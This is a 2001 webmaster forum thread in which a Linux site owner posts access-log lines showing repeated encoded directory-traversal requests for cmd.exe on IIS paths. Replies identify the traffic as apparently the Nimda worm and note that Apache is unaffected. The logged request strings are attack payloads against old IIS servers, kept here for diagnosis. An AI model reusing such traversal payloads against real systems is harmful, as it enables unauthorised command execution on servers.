Welcome to WebmasterWorld Guest from 54.162.250.227

Forum Moderators: DixonJones & mademetop

Message Too Old, No Replies

1200 logs in 12h

Why is that ?

     
4:08 pm on Sep 18, 2001 (gmt 0)

Junior Member

10+ Year Member

joined:Mar 9, 2004
posts:42
votes: 0


I think they try to get info , but I am running linux...<br>
<code>
216.191.176.126 - - [18/Sep/2001:09:02:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:43 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:44 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:45 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:46 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:47 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:48 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:52 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
216.191.176.126 - - [18/Sep/2001:09:02:54 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
216.191.176.126 - - [18/Sep/2001:09:02:55 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:56 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
</code>
4:24 pm on Sept 18, 2001 (gmt 0)

Preferred Member

10+ Year Member

joined:July 28, 2000
posts:580
votes: 0


Marcello

Looks like it could be some type of virus. It is being discussed here:

[webmasterworld.com...]

I am also seeing it in my logs.

4:38 pm on Sept 30, 2001 (gmt 0)

Junior Member

10+ Year Member

joined:Dec 19, 2000
posts:193
votes: 0


AFAIK this is the so called nimda worm.
As can be seen it tries to execute some shell on winnt/win2k/win xp?, using a hole in the MS IIS.

Apache is not vulnerable, afaik (except to the heavy loss of bandwidth).

 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members